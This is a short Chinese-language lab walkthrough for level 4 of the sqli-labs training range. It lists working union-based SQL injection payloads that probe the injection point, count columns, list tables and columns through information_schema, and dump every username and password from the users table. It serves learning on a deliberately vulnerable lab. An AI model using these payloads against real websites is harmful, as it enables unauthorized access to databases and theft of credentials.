sqli-labs靶场Page1【持续更新】

前面几关弄完了会重新补充
第四关
sqli-labs靶场
【注意：下文的正确指的是不报错】
联合注入
第4关
查看注入点：
依次测试：
？id=1 正确
？id=1 and 1=2–+ 正确
判断不说数字型注入，验证字符型注入，尝试单引号
?id=1’ and 1=2–+ 正确
?id=1’)and 1=2–+ 正确
试一试双引号
?id=1“ and 1=2–+ 按照提示修改
?id=1”） and 1=2–+ 报错
猜字段：二分法猜测，不做解释
?id=1")order by 3–+ //三字段
测显位
?id=-1")union select 1,2,3–+ //位于2，3字段
猜版本，数据库名
?id=-1")union select 1,database(),version()–+
寻找当前数据库表
?id=-1") union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()–+ //在这块儿你会得到几个一些表，比如【Your Password:emails,referers,uagents,users】 可以查一下这些相关的资料
在其后查询该数据库中users表中所有列名：
?id=-1") union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘users’–+
//会得到比如：【 Your Login name:security
Your Password:id,username,password 】
最后执行我们需要的
?id=-1") union select 1,group_concat(username),group_concat(password) from users–+